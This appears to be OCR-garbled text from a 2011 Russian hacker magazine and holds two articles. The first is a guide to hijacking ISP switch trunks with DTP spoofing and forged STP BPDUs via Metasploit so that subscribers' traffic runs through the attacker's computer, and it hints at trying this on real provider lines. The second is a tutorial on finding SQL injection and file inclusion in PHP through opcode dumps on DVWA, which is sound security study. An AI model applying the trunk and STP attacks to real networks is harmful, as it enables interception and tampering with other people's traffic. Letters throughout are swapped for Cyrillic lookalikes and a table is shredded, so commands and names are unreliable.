Оаіеѵѵау Ргоіосоі, протокол граничного шлюза), особенно если он 
РиІІѴіеѵѵ (общемировой), я бы не рекомендовал на него вешать. В 
этом случае для экспериментов лучше поднять никсовый комп с 
какой-нибудь Оиадда. 

Примеры конфигурации маршрутизаторов ты легко найдешь в 
интернете. Если же станет интересно разобраться во всех под- 
робностях этих конфигов, то тебе прямая дорога в соответствую- 
щие группы в социальных сетях, например в ѵк.сот/сІиЬ21 9391 24 

— здесь много видео для изучения. 

После всех приготовлений запускаем Оупаппірз Зегѵег, а затем 

— созданный нами файл конфигурации 3745_гоиІеппеІ (для 
этого достаточно дважды щелкнуть по нему). Откроется 2 окна: 
«Информационное окно Оупатірз» и «Управление маршрутиза- 
торами». 

Вот некоторые команды управления маршрутизаторами, которые 
могут пригодиться: 

и§* — список и состояние маршрутизаторов; 

З+агІ" — запуск маршрутизаторов; 

5+агі /аІІ — запустить все; 

Зіагі' В1 — запустить П1 (регистр имеет значение); 

З+ор — остановка маршрутизаторов; 

Зіор /аІІ — остановить все; 

Зіор В1 — остановить П1 (регистр имеет значение); 

ТеІпеІ — подключение к маршрутизатору; 

ТеІпеІ /аІІ — подключиться ко всем; 

ТеІпеІ К1 — подключиться к П1 (регистр имеет значение). 

Теперь ты можешь поиграть с конфигурацией самого роутера, под- 
ключившись к нему через Теіпеі, и настроить порт Р1/0 как ассезз 
рогі в ѴІ_АІ\І1 или как Ігипк рогі с паііѵе ѴІ_АІ\І1 или ѴІ_АІ\І2. В общем, 
полная свобода действий. 

Атака на магистраль — поднима- 
ем тгипк с помощью ОІР 

Динамический магистральный протокол (Оупаппіс Тгипк Ргоіосоі) 
обычно используют для согласования параметров магистрального 
соединения между коммутаторами провайдера или крупной корпо- 
ративной сети. В коммутаторах Сізсо Саіаіузі по умолчанию порт 
работает и не в режиме тобе ассезз, и не в режиме тобе Ігипк, но 
йТР изначально активирован на всех портах. По умолчанию маги- 
стральный порт является членом всех виртуальных локальных сетей 
коммутатора, то есть потенциально через него проходит весь трафик 
всех виртуальных сетей. Информация о принадлежности отдельных 
кадров к виртуальной сети передается в соответствующем теге 
ѴІ_АІ\І. В такой ситуации стоит только нам притвориться магистраль- 
ным коммутатором, как будет установлено транковое соединение, 
и мы получим доступ ко всем ѴІ_АІ\Гам, сконфигурированным на 
коммутаторе. После успешной организации магистрали мы получим 
полный доступ к пересылаемому по ней трафику, в том числе и ко 
всем передаваемым служебным сообщениям протоколов маршрути- 
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Примерная схема организации сети провайдера 

зации. Задача сама по себе не нова, но поскольку Сізсо никогда не 
публиковала спецификацию РТР, подобный метод проникновения 
в сеть долгое время считался возможным лишь теоретически и 
только с использованием составляемых вручную пакетов. Однако 
при помощи инструмента АихіІіагу/зрооіѴсізо/бІр ( теІазрІоіГсот/ 
тобиіез/аихі Ііа гу/зрооб/сізсо/бі ) можно легко управлять процессом 
проникновения в магистраль посредством удобного меню. Всего-то 
нужно вбить в поле ПН05Т ІР-адрес исследуемого коммутатора и 
нажать кнопку РІІІЧ. Где получить ІР-адрес для атаки? В сети, если 
немного послушать ее ѴѴігеЗЬагк’ом. В ходе эксперимента после 
инициализации порта стал доступен ѴІ_АІ\І 10, который был ранее 
сконфигурирован на эмуляторе, а теперь стало возможным подклю- 
читься к нему и манипулировать передаваемой там информацией. 
Перед тем как в научных целях искать магистральный порт (напри- 
мер, порт коммутатора 5ѴѴ0, см. схему) в каком-нибудь офисном 
центре или на крыше собственного дома, куда приходит оптическая 
магистраль, лучше в домашних условиях потренироваться подни- 
мать и захватывать Ігипк на эмуляторе Сізсо. Один важный момент 
- йТР работает только на коммутаторах Сізсо, и если ты увидишь на 
коммутаторе надпись О-Ыпк, то про йТР ты можешь забыть и пере- 
ходить к исследованию 5ТР. 

Атака на провайдера 

Конечно, йТР хорош в магистральных сетях, но чаще проводные 
провайдеры, предоставляющие услуги доступа в интернет по 
технологии х05І_ или РТТР, в своих городских сетях используют 
протокол 5ТР на оборудовании О-Ыпк с распределением трафика 
по ѴІ_АІ\Гам. 5ТР применяется для автоматического управления 
топологией сети с дублирующими каналами. Действительно, если 
сетевое оборудование связано для надежности избыточным чис- 
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Рогде 5раппіпд-Тгее ВРОІІз 

лом соединений, то без принятия дополнительных мер кадры будут 
доставляться получателю в нескольких экземплярах, что приведет 
к сбоям. Следовательно, в каждый момент времени должен быть 
задействован только один из параллельных каналов, но при этом 
необходимо иметь возможность переключения при отказах или 
физическом изменении топологии. Суть проникновения в сеть 
провайдера для последующего захвата трафика, его анализа и 
модификации (в случае возникновения такой надобности) с исполь- 
зованием 8ТР заключается в изменении логической структуры сети 
таким образом, чтобы интересующий нас трафик пошел через нас. 
Допустим, наш компьютер оснащен двумя сетевыми интерфейсами, 
один из которых подключен к клиентскому сегменту, а другой — к 
серверному (например, к ЗѴѴО и ЗѴѴ1 или ЗѴѴО и Р1, см. схему). 
Посылая соответствующие ВРОІІ с помощью теіазріоіі-модуля 
Рогде Зраппіпд-Тгее ВРОІГз, мы инициируем выборы назначенного 
моста для обоих сегментов и выигрываем их. Существующий канал 
между коммутаторами ЗѴѴО и 8ѴѴ1 (или между 8ѴѴ0 и Р1) выключает- 
ся, и весь межсегментный трафик направляется через наш компью- 
тер. Что нужно для того, чтобы начать рассылку пакетов изменения 
дерева сети? ЕіЬегпеІ-розетка, установленная дома и подключен- 




Получение ІР-адреса в ѴѴігеЗЬагк 

ная непосредственно в порт к одному из коммутаторов провайдера, 
или А08І_-модем, настроенный в режиме моста. 

Этот модуль работает еще проще, чем в случае с йТР - тут не надо 
указывать вообще ничего (даже ір), нужно просто включить ком- 
пьютер в сеть и нажать ПІІЫ, остальное Меіазріоіі сделает сам. 
МАС-адрес и сетевой интерфейс подставляются в модуль автома- 
тически. 

Да, чуть не забыл! При таком раскладе, если ты собираешься про- 
пустить через свой компьютер трафик работающих абонентов про- 
вайдера, то чтобы этот трафик пошел дальше, нужно задействовать 
службу маршрутизации, встроенную в ѴѴіпсІоѵѵз ХР, как написано 
тут: зиррогІ.тісгозо^.сот/кЬ/ЗІ 5236 . Причем если мы выиграли 
выборы между 8ѴѴ0 и ПІ , то через наш компьютер пойдет весь 
трафик этой сети, который мы можем также посмотреть при помо- 
щи ѴѴігеЗЬагк. Однако совсем не обязательно иметь включение в 
маршрутизатор ПІ, можно задействовать внешний канал интернета 
другого провайдера и перенаправить весь трафик фиксированных 
абонентов на него - в этом случае шанс успешного проникновения 
в сеть и захвата трафика есть потенциально у любого абонента 
данной сети. 

Соответственно, если ѴІ_АІ\Гов много, то для пропуска трафика 
мы должны также сконфигурировать их все на своей машине. Тут 
совсем не обязательно использовать ѴѴіпсІоѵѵз ХР, в качестве моста 
ты можешь использовать собранный эмулятор Сізсо с двумя (или 
более) сетевыми картами, с присутствующей в конфигурации кар- 
той ЫМ-16ЕЗѴѴ. 

Опять же, лучше предварительно потренироваться строить сети 
на эмуляторе Сізсо, а уже только потом ставить эксперименты на 
реальных сетях. 

Конечно, следует учитывать тот факт, что связь между коммутато- 
рами может осуществляться со скоростью 1 Гбит/сек, а «пользова- 
тельские» порты способны работать со скоростью всего лишь 100 
Мбит/с. В этом случае межсегментное соединение превратится в 
узкое место с неизбежной потерей пакетов. Ситуация может усугу- 
биться, если часть трафика необходимо каким-либо образом изме- 
нить — в этом случае тебе понадобится довольно мощный компью- 
тер, который ты будешь использовать в качестве моста. 

Заключение 

Ошибки в такой сложной области, как информационные технологии 
и, в частности, телекоммуникации, бывают всегда. Однако это не 
означает, что их развитие должно из-за этого тормозиться — не 
ошибается лишь тот, кто ничего не делает. Между тем с усложнени- 
ем технологий необходимо переходить к качественно другим мето- 
дам эксплуатации транспортных сетей, учитывающим все нюансы 
функционирования системы, возможные ходы или агрессивное 
поведение абонентов и, конечно же, вопросы обеспечения безопас- 
ности. Т 
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• Да, мы снова возвращаемся к теме поиска уязвимостей в РНР- 
скриптах. Предугадываю твой скептический настрой, но не закисай 
так быстро! Я постараюсь освежить твой взгляд на возможности 
исследования кода. Сегодня мы посмотрим, как можно найти 
уязвимости в условиях плохой видимости, а также ты узнаешь о 
возможностях динамического анализа кода, которые нам рад 
предложить сам интерпретатор РНР. 



Цель дайвинга 

Возможно, вариант, который я хочу тебе предложить, более тру- 
доемок в плане мозговой деятельности, но тут уж тебе самому 
выбирать — каждый раз делать обезьянью работу или исполь- 
зовать свой ум по назначению, то есть понять основы, а затем 
наращивать опыт. Я все-таки за то, чтобы разобраться раз и 
навсегда. 

А теперь зададимся таким вопросом — как ты ищешь уязвимости 
в веб-приложениях? Дай угадаю. Скачиваешь движок, начи- 
наешь ознакомление с исходниками, грепаешь его на предмет 
наличия разных сомнительных функций или ищешь уязвимые 
куски кода по шаблону, запускаешь сканер, наподобие РІР5... 

Ну, если исходник уже проверен и знаком, то можно задачу 
упростить и просто сравнить версии движков инструментом 
типа ѴѴіпМегде. Но что делать, если, допустим, движок обфус- 



цирован или занимает необъятные просторы жесткого диска? 
Конечно, можно пытаться проделать всю черную работу вручную. 
Допустим, попробовать деобфусцировать, но результат не всегда 
удовлетворяет нашим требованиям. Можно положиться на уже 
упомянутые методы обнаружения уязвимостей и копать исход- 
ники до посинения. В общем, это не вариант, когда есть другой 
метод — если не более перспективный, то уж точно необходи- 
мый. 

Исходный код мы вообще не будем трогать, нам даже смотреть на 
него не нужно. Я предлагаю тебе спуститься на уровень чуть ниже, 
чем тот, на котором ты привык работать с веб-приложениями, в част- 
ности с РНР. Ты определенно слышал что-то про Іепд, хакинг ядра 
РНР, опкоды и тому подобное. А может быть и вовсе писал расшире- 
ние для РНР, пусть даже «Ьеііо, ѵѵогісі»? Тогда тебе будет еще проще, 
но обо всем по порядку. 
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Инструктаж 

Хочу тебя предупредить, что документирован 2епб 
Епдіпе весьма скудно. Есть книга, посвященная тому, 
как расширять РНР — «Ехіепбіпд ап 6 ЕтЬесИіпд 
РНР», но той уже пять лет, да и не вся информация 
там присутствует. Кое-какая информация представле- 
на в книге «Абѵапсеб РНР Ргодгаттіпд», но, опять 
же, книге целых семь лет. Есть кое-что в самом Ману- 
эле РНР, периодически встречаются разные огрызки 
в интернете... Большинство актуальной и нужной 
информации можно узнать из исходников других про- 
ектов, интерпретатора РНР и различных презентаций. 
Чтобы работать с инструментарием, о котором я рас- 
скажу чуть позже, тебе нужно понять, что вообще про- 
исходит с кодом, когда его выполняет интерпретатор 
РНР. Я не буду сильно вдаваться в подробности, так 
как это может занять объем дюжины журналов и выхо- 
дит за рамки темы. Но данных деталей тебе вполне 
хватит, чтобы понять сабж и двигаться дальше самому. 
Если представлять картину обработки веб- 
приложения в упрощенном виде, то участвуют четыре 
компонента. Первый — ядро РНР, которое разбирает 
запросы и занимается файловыми и сетевыми опера- 
циями. Второй компонент — это виртуальная машина 
Іе пб Епдіпе, в которой происходят нас интересую- 
щие процессы: компиляция и выполнение скрипта, а 
также распределение памяти и ресурсов. Третий ком- 
понент — это обычные расширения РНР типа тузді, 

2 Іі Ь , си гі и тому подобные. Четвертый — это 8АРІ или 
серверное АРІ, такое как СБІ, тоб_рбр, Іюзісді. 

Теперь разберемся с тем, что происходит со скриптом, 
когда тот попадает на выполнение РНР. Для краткости 
я пропускаю весь процесс инициализации и действия, 
совершаемые после того, как выполнилось прило- 
жение, — нам сейчас это не важно. В общем, после 
завершения инициализации происходит лексический 
анализ файла — разбор на токены, затем синтакси- 
ческий анализ, где определяется их грамматическая 
структура. Образуется байт- код. Это этап, который 
называется компиляцией. Затем полученный байт-код 
(ор_аггау) выполняется при помощи 2епб_ехесіЛе(). 
Проход по массиву опкодов осуществляется два раза, 
так как необходимо заполнить недостающую инфор- 
мацию, недоступную после первого прохождения. 

Одна из многих причин такого алгоритма — это необ- 
ходимость в нахождении адресов для таких опкодов 
как разновидности 6МР, САН, 5ѴѴІТСН. Еще имей в 
виду, что при инклуде скрипта процесс возвращает- 
ся к точке компиляции файла, а при вызове метода 
или функции — к выполнению байт-кода. Глянь на 
соответствующую картинку, это должно помочь тебе 
сориентироваться. Кстати, расширение АРС, закеши- 
ровав опкод, в дальнейшем пропускает весь процесс 
компиляции, за счет чего и добивается прироста про- 
изводительности. 

Ну а теперь поподробней про байт-код. Байт-код, про 
который я говорю, это своего рода ассемблер для 
виртуальной машины 2епб. Он представляет из себя 
упорядоченный набор инструкций — массивы опкодов 
ор_аггау. Здесь содержится такая информация как 
название функции и ее тип, имя файла, номер испол- 
няемой строки, строки опкодов и так далее. Строки 
опкодов, в свою очередь, вмещают в себя то, что 
представлено в структуре _ 2 епб_ор. Данная структура 
определена в файле 2 епб/ 2 епб_сотріІе.Ь и выглядит 
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Примерно так выглядит цикл пищеварения 
РНР-скриптов 

следующим образом: 

зіігисі: _ 2 епб_ор { 

орсобе_бапб1ег_1: Ііапбіег; 
гпобе гезиіі:; 
гпобе орі; 
гпобе ор2; 

и1оп§ ех1:епбеб_ѵа1ие; 
иіпі: Ипепо; 

2 епб_исІіаг орсобе; 

}; 



Операнды орі и ор2, которые также представляют из себя 
структуры, могут иметь один из пяти ТИПОВ: 

• ѴАР — представляет из себя ссылку на реальную пере- 
менную (символ $); 

• ТМР — временная переменная для содержания проме- 
жуточных значений во время таких операций, как матема- 
тические вычисления, конкатенации (символ ~); 

• СѴ — компилированная переменная, оптимизирован- 
ный вариант ѴАР (символ !); 

• С0Ы8Т — константные значения типа чисел, строк, и 
так далее; 

• ШЧІІ8Е0 — неопределенный операнд; 

Результирующий операнд гези и, который не всегда 
заполняется, может иметь типы ѴАР, ТМР, СѴ. Самый 
последний элемент — это один из номеров опкодов, 
от 0 до 153 (РНР 5.3.6), которые определены в Хеп б/ 
2 епб_ѵт_орсобез.Ь. От версии к версии их число 
может меняться, а опкоды с 1 1 6 до 1 31 не определены. 
Вообще, многие внутренние механизмы РНР регу- 
лярно подвергаются самым разным изменениям ради 
целей оптимизации и внедрения нового функционала. 
И про версию 4 забудь, акцент ставится на версию 
5.1. и выше. Стоит отметить, что весьма существенные 
изменения произошли как раз в версии 5.1, в том 
числе был добавлен тип СѴ, а на каждый опкод стало 
25 обработчиков опкодов. Между прочим, это является 
одной из главных причин, позитивно повлиявших на 
скорость работы интерпретатора. А когда ты увидишь 
!п в листингах, то знай, что в прошлой жизни это была 
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Модифицированная 
версия еѵаібоок лежит 
на нашем диске. 
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Так выглядит дамп ѵісі 



самая обычная переменная РНРтипа $ѵаг. 

Кстати, не задумывался ли ты о том, что происходит с текстом (допу 
стим, Ыті), когда тот не включен в РНР, вот как тут: 

< РрИр 
$ѵаг = 1; 

?> 

<М1:т1> 



следующие команды: 

ріірііе 

соп1і§иге 

таке 

таке Іпз1:а11 

Теперь остается поправить рбр.іпі, добавив такие строки: 



РНР делает просто — компилирует в выражения ЕСНО. То есть 
такой, казалось бы, незадействованный участок тоже участвует в 
процессе обработки кода. И даже если там будет одинокий сим- 
вол пробела или перенос строки, то РНР обработает и их. Все 
аналогично тому, как происходило бы, будь там есИо(]. Ну это так, 
тебе на заметку. 

Акваланг, ласты и прочее 

Некоторые коварности ЬуіекіЕа. 

Хочу предупредить о том, что могут быть проблемы при дампе 
опкодов на версиях РНР 5.2.*. Лично у меня на некоторых плат- 
формах графики строились не совсем корректно. В то же время 
на РНР 5.3. все работает как положено. Также советую увеличить 
объем памяти, доступный РНР, — я себе выставил 384 Мб, так как 
некоторые скрипты (например, 5сап_еѵа1.рЬр) пожирают нещадно 
много памяти. При поиске уязвимостей на том уровне, про кото- 
рый мы говорим, можно работать непосредственно с опкодом, а 
можно и вовсе реализовать автоматический мониторинг всего и 
вся — переменных, методов, функций. Конечно, последний вари- 
ант более предпочтителен, но для начала нужно и в первый вник- 
нуть. А потом уж все в твоих руках. 

Для дампа опкодов РНР существуют как минимум два расши- 
рения — Ѵиісап І_одіс Оитрег (ѵШ) и Ьуіекіі. Это самые надеж- 
ные варианты из тех, что я нашел, да нам больше и не нужно. 
Установка расширений достаточно проста — вводишь в консоли 



ех1:еп5Іоп=Ьу1:екі1: . бо 
ех1:еп5Іоп=ѵ1сІ . бо 

Хотя можно подключить расширение, приписав строку -б 
ехІепзіоп=ЬуІекі1.50 во время вызова РНР. Вот и все, готов к 
труду и обороне. 

Пожалуй, наиболее полезное и интересное расширение — это 
Ьуіекіі (который сначала назывался Ьуіебіз) от Стефана Эссера. 
Он как раз и создавался для наших целей — в нем реализованы 
дизасм опкодов, визуализация потока выполнения приложения 
(дампя информацию в формате *.боі) и недоступная простым 
смертным улучшенная визуализация при помощи Хупаплісз 
В і п N аѵі (используя скрипт р Ь р2зц I) . Вообще, идея написания 
такого расширения появилась из-за неудовлетворенности уже 
существующим расширением рагзекіі, которое больше не под- 
держивается, работает крайне нестабильно, вываливаясь в 
эедба и и, да и криво к тому же. Изначально при помощи Ьуіекіі 
Стефан решал задачу облегчения поиска уязвимостей в прило- 
жениях, накрытых защитой типа ХепОиагб, іопСибе. Однако для 
получения опкодов сначала необходимо их восстановить, решая 
проблемы обфускации, защиты перехвата функций и так далее. 
Но эта весьма объемная тема и заслуживает отдельной статьи, 
поэтому для начала обратим наше внимание на более простые 
вещи. К тому же наша статья не про снятие защиты, а про поиск 
уязвимостей. 

Еще одно интересное расширение (опять от Стефана Эсера) — 
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Визуализация потока выполнения РНР-скрипта 



это еѵаібоок. Вероятно, по названию ты уже догадался о его 
принципе работы и назначении — перехват всех еѵаЦ] а также 
ргед_герІасе() с модификатором е, сгеаІеДюпсбопП, аззегШ- 
Когда скрипт попытается выполнить код при помощи данной 
конструкции или одной из функций, еѵаібоок перехватит такой 
вызов, покажет строку, которую необходимо выполнить, и спросит, 
продолжить ли выполнение. Реализация расширения достаточно 
проста — ставится хук на 2епсІ_сотріІе_5Ігіпд(), который компи- 
лирует строку, при необходимости спрашивает пользователя о 
дальнейших действиях и затем отдает управление обратно ори- 
гинальной функции. Стефан представил еѵаібоок в прошлом году 
во время проекта «МопіЬ 01 1 РНР Видз» (как его найти — смотри в 
выносе «ѵѵеЬ»), 

Однако мне еѵаібоок не понравился тем, что его можно запускать 
только из консоли. Поэтому я решил добавить функционала в 
расширение — теперь можно гонять скрипты из браузера, а рас- 
ширение на фоне будет писать в лог-файл все то, что попадает в 
вышеупомянутые функции. Более про него рассказывать не буду 
— подробную инструкцию по применению и само расширение 
ищи на диске. 

В принципе, это все, что доступно публично для динамического 
анализа и имеет какой-то смысл. Но дальше ты увидишь, что 
не так уж и проблематично построить мощный инструментарий. 
Остается только гадать, что есть в арсенале у серьезных исследо- 
вателей :). 



Начинаем погружение 

Вот мы и добрались до самого интересного момента — практики. 

В качестве примера возьмем БѴѴѴА версии 1.0.7 и рассмотрим 
некоторые, так сказать, стандартные уязвимости — ЗОБ-инъекцию 
и РІ. Но сначала небольшая настройка — лучше отключить 
ХйеЬид, он будет вставлять нам ненужные опкоды. В системе у 
тебя должен присутствовать сЫ, ну и не забудь установить наше 
заведомо уязвимое приложение. Вместе с расширением Ьуіекіі 
поставляются скрипты, которые делают много полезных вещей. 
Позже мы рассмотрим парочку, но сейчас нам нужно лишь полу- 
чить графическое представление потока исполнения приложения 
в виде опкодов. Скрипты лежат в папке ехатріез, зайди туда и 
запусти такую команду: 

рбр рбр2сІо1:_5Ітр1е. рбр /ѵаг/ыыы/Іі1:сІос5/Іі/сІѵыа/ 
ѵи1пегаЬі1і1:іе5/5д1і/5оигсе/1оы. рбр здіі-і 

В качестве первого аргумента данный скрипт принимает назва- 
ние тестируемого скрипта, второй аргумент — это название 
папки, куда дампить результат. В папке должны появиться *.с!оІ- 
и *.зѵд-файлы. Если тебе не по нраву *.зѵд, то из *.боІ можно 
сконвертировать в *.рпд такой командой: 

сіоі: -Трп§ -о ./ххх.рп§ ххх.сіоі: 

Думаю, здесь ничего пояснять не нужно. Ну а теперь приступа- 



ХАКЕР 06 /149/ 201 1 



► 059 







взлом 



Ёіп* 


* л 


ад 






др*гапй5 ^ 


. Р-*рн]_ЗЧО 


1 






V 


9 


6 


МЙ 






’ЛЁІЁИ^ігЫ: пмеІЗІѴІл-51: 




7 


айГѵаа 




-ѣ 


-Ь. !9 




9 


шГсшй 




-5 






9 


гаын 






!1р -5 


19 


19 


5Е№ т 






П 




и 


00 кж 




I 






12 


Н&КИ 




№ 


\ 2 , |7 




в 


» 2КРН2 ЕХ 




-9 


1в. ->1-9 



\іт 


і 


* ад Гёісіі 


ыі №СііШ 




ѳ 


3 


9 






р бгг 






1 




1 


I#. 'ЗііМІГ 






г 






-1. >4і 




1 


3 


* РЕТОі й яіеьлі 




к БЕТ" 






4 


РЕТСН МК А 




1?. 'Ы' 






3 


даю) 




Г*. 







10 * 


РВЕЕ 




-о 


ѳ 


12 


20 


ЗЕ№ № 




12 




21 

п 


ію №и.і 
«ЙОН 


і 


ГНИЛ№‘ 

О. ІІІ 




14 


н 


тт 




І*. а 





17 27 > 






Чоу.рйр' 


О 


. . е*ренно . _ . 
21 Ѣ2 > 




И. 


■и^іілргчр" 




. . . . 
26 39 > 


ІИИОН 


! 1» 







ем к анализу. Открыв график, обрати внимание на второй блок 
слева, который мы будем исследовать. У тебя должно быть при- 
мерно такое же полотно®. 

Почему примерно? Просто очень вероятно, что наши листинги 
не будут совпадать тютелька в тютельку из-за разницы версий 
РНР, но это не критично. Еще один момент — листинг, кото- 
рый ты видишь тут, отличается от графического наличием двух 
колонок впереди опкодов. Я просто сделал дамп при помощи 

ѴІСІ : 

рбр -сі ех1:еп5Іоп=ѵ1сІ . 50 -сіѵісі . ас1:іѵе=1 /ѵаг/ыыы/сіѵыа/ 
ѵи1пепаЬі1і1:іе5/5ЯІі/5оипсе/1оы. рбр 

Первая колонка — это номер строки, вторая — порядковый 
номер опкода. На графике же первой колонкой обозначен адрес 
того или иного опкода. Кстати, на графике вверху видно, что 
это дамп для функции таіп() — прямо как в С, с нее начинается 
выполнение скрипта. 

Итак, перед нами самая банальная ЗСИ-инъекция. Где же это 
видно? Начнем с наиболее понятного: нам знакома строка 
50І_-запроса на линии 9, под номером опкода 6. Во временную 
переменную ~5 сохраняется данная строка, затем, на следующей 
линии, к этой же переменной добавляется компилированная 
переменная !0. Последний символ, который сохраняется в этой 
переменной — это 39, что означает кавычку. Опкод А55І6Ы 
завершает все действия 9 строки присвоением переменной И 
значения ~5. В данном квартете интерес представляет компили- 
рованная переменная !0. Нам важно понять, откуда у нее растут 
ноги. Для этого вернемся в самое начало исследуемого блока®. 
На первых двух строках дампа происходит проверка наличия 
индекса 'ЗиЬпгнП в массиве $_Ѳ ЕТ, а ЛЧР2 хочет прыгнуть по 
адресу 48 в случае, если результат — 0, то есть, когда проверяе- 
мый элемент отсутствует. 

На графике видно, что это прыжок к выходу — РЕТІІРЫ 1. На 
линии под номером 7 довольно очевидно, что последующие три 
строки делают какие-то манипуляции с глобальной переменной 
$_6ЕТ. Здесь ЕЕТСН_Р читает значение массива в $2, затем 
ЕЕТСН_ОІМ_Р получает значение элемента 'ісГ и записывает в 
$3. Обрати внимание на *_Р — это означает чтение ака геаб. 
Есть еще и *_ѴѴ — ѵѵгііе, для записи, и *_РѴѴ — геаб/ѵѵгііе, для 



чтения и записи. Ну а далее в дампе находится нам уже зна- 
комый опкод присвоения, который занимается тем, что снова 
копирует значение переменной $3 (не путай с обычной пере- 
менной РНР) в !0. Идем далее. Следующий опкод 5ЕЫ0_ѴАР 
занимает место первого аргумента для последующей функции, 
читая значение первого операнда, в данном случае И. Второй 
операнд означает порядковый номер аргумента. Судя по гра- 
фику, 00_ЕСАЕЕ вызывает функцию ту5ЦІ_риегу() и полученное 
значение сохраняет в $7. 

Вероятно, ты заметил, что на данном участке не было никаких 
других вызовов функций, а также прыжков в какие-либо другие 
места. 

Это отчетливо говорит о том, что здесь отсутствуют какие-либо 
проверки переменной, а значит — есть место для уязвимо- 
сти. Данный блок завершает опкод 6МРЫ2_ЕХ. Что он делает? 
Делает он самый обычный хог над переменными ~9 и $8. В том 
случае, если результатом операции является 0, то управление 
передается на адрес 19 (исходя из дампа ѵШ ) . На графике видно, 
что по данному адресу находится такой вот дамп®. 

Здесь тебе должно быть все ясно. Ну, может быть, кроме опкода 
ГРЕЕ — он просто высвобождает ресурсы, занятые указанной 
переменной. В этом примере больше нет ничего интересного, 
плывем дальше. 

По аналогии с предыдущим примером сделай дампы бѵѵѵа/ 
ѵиІпегаЬіІіСезЛі/іпбех.рИр и бѵма/ѵиІпегаЬШііезЛі/зоигсе/ 
тебіит.рЬр. Открой график для дампа индекса — поищем там 
инклуд файлов. В первую очередь тут следует обратить внима- 
ние на опкоды групп ІІЧСШОЕ, РЕСИЛРЕ, и от них уже можно 
двигаться в обратном направлении. Допустим, самый первый 
РЕОШРЕ_ОІ\ІСЕ не представляет для нас никакого интереса — 
он пытается заинклудить файл, имя которого находится во вре- 
менной переменной ~2. 

А собирается эта переменная лишь из константных значений. 
Следующий такой же оператор встречается в самом последнем 
блоке. Здесь в переменную ~24 склеились две других перемен- 
ных такого же типа 22 и ~23. Но и они принимают значения 

констант. Подозрительной тут выглядит компилированная пере- 
менная И — ее следует искать в других блоках. Нашли, но видим 
строки следующего типа®. Что означает не что иное, как РНР 
код, подобный такому: 



► обо 
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$ѵагіаЬ1е = ' Іом. рбр ' ; 

Название переменной я придумал сам, ибо в дампах имена 
переменных отсутствуют. Хотя их совсем не сложно получить. 

Но не отвлекаемся, уязвимости тут снова нет, значит, идем к 
следующему опкоду в том же самом блоке — ІІ\ІСІ_ІЮЕ. Он пыта- 
ется заинклудить имя файла, содержащееся в !2. Но если ты 
посмотришь на график, то определения такой переменной ты 
не найдешь. Как же так? Все просто — в данном файле она не 
определена, поэтому нужно смотреть, какие файлы инклудит 
данный скрипт. 

Теперь открой второй график для тесМит.рЬр. Тут вообще один 
одинокий блок. Имей в виду, что нумерация снова начинается 
с нуля, поэтому не ищи здесь !2. В данном блоке видна всего 
лишь одна компилированная переменная ! О, с которой и про- 
исходят всякие манипуляции. В принципе, тут есть уже все 
известные нам опкоды, и тут ты уже должен определить, что 
происходит слабенькая фильтрация !0 при помощи функции 
5Іг_гер[асе(). В самом конце блока видно финальное присваи- 
вание и выход из скрипта. Таким образом, можно установить, 
что данный скрипт содержит потенциальную уязвимость. Но 
в нашем случае, уже имея на руках анализ файла іпбех.рЬр, 
можно уверенно сказать, что здесь присутствует уязвимость типа 
инклуд файлов. 

Мы разобрали с тобой примеры, но какой вывод можно сделать 
из всего этого, и на что нужно обращать внимание? Главным 
образом тебя должны заинтересовать «потенциально небез- 
опасные» опкоды. А это опкоды типа 00_РСАи_, В0_РСАи__ 
ВѴ_І\ІАМЕ, ІІ\ІСІ_ІЮЕ_ОР_ЕѴАІ_, ЕСНО. Степень их риска можно 
определить по тому, к какому типу принадлежат операнды кон- 
кретного опкода, и что делает эта функция. Ну например, если 
мы видим операнд-константу, которая никак не изменяется, то 
вполне ясно, что данный опкод или даже группу можно спокойно 
игнорировать. 

Если же нечто иное, то повод задуматься. Хотя нечего думать, 
надо делать обратную трассировку. Но это уже ближе к концу. 

А с чего начинать анализ? Тут все как обычно — анализ начи- 
нается с поиска глобальных переменных, как в примере с 5СН_- 
инъекцией, а также с других участков кода, где данные поступа- 
ют на вход, будь то файловые функции, функции с базой данных 
и так далее. 

Опкоды ЕЕТСН_Р, ЕЕТСН_ѴѴ помогут тебе идентифицировать 
места записи и чтения переменных. А семейство А55ІѲІМ выявит 
любые присвоения переменных РНР. Таким образом, зная, что 
делает каждый опкод и в каких комбинациях операндов, их 
типов и значений есть угроза безопасности, можно вынести вер- 
дикт конкретной переменной. 

Во избежание 
кессонной болезни 

Конечно, чтобы вручную копаться в опкодах, нужно иметь тер- 
пение и время. Фактически, данный подход ничем не уступает 
по сложности анализу самого обычного ассемблерного полотна, 
которое мы видим в ЮА. Но в случае с РНР, если есть нормаль- 
ный исходник, то нет никакого смысла в поиске уязвимостей 
среди опкодов. 

А для чего тогда я все это рассказывал? Если ты пишешь авто- 
матический динамический сканер, задача существенно упро- 
щается, и знать основы того, о чем я говорил выше, просто 
необходимо. Внедряясь в РНР, можно творить все что нашей 
хакерской душе угодно — перехватывать любые функции, дам- 
пить аргументы и их значения, делать трассировку переменных. 
И этого вполне хватит для того, чтобы достоверно определить 
наличие уязвимости. Гуляй — не хочу, можно хоть автоматически 
генерировать эксплойты :). 

Еще из серии того, на что способны расширения РНР: Ьуіекіі 



предоставляет АРІ, при помощи которого можно самому конструи- 
ровать полезные утилиты. Например в той же папке ехатріез/ 
есть утилита для быстрой проверки наличия уязвимостей типа ГГ 

рбр -сі ехіеп5Іоп=Ьу1:екі1: . 50 Ьу1:екі1:-Ѳ.1.1/ехатр1е5/ 
сбеск_іпс1исІе . ріір іпсіех . рГір 

іпсіех. рГі р ( 30 ) : геяиіге_опсе 0ѴІлІА_1лІЕВ_РАеЕ_Т0_К00Т. 
"уиХпега^Н-^еБ/б/Боигсе/^уиХпегаЬп.Н-ЕуРп.З.е}" ; 
іпсіех. рГір ( 35 ) : Іпс1ис1е($ій1е) ; 

И еще один суперский инструмент, перехватывает все подозри- 
тельные еѵаГы: 

/ѵаг/ыыы$ рбр -сі ех1:еп5Іоп = Ьу1:екі1: . 50 Ьуіекіі-Ѳ. 1 . 1/ 
ехатр1е5/5сап_еѵа1 . рбр ./ 

/ѵаг/ыыы/сІѵыа/ех1:егпа1/рІірісІ5/Ѳ. 6/1іЬ/Ю5/ѵепсІог5/ 
Іііт1ригі1йег/НТМІ_Ригібег/ѴагРаг5ег/І\Іа1:іѵе . рГі р ( 17 ) : 

$ге5и11: = еѵа1("\$ѵаг = $ехрг;"); 

РНР ІлІагпіп§: Ьуіекіі_сІІ5а55етЫе_Ій1е( ) : Ьу1:екі1:_§е1:_пех1:_ 
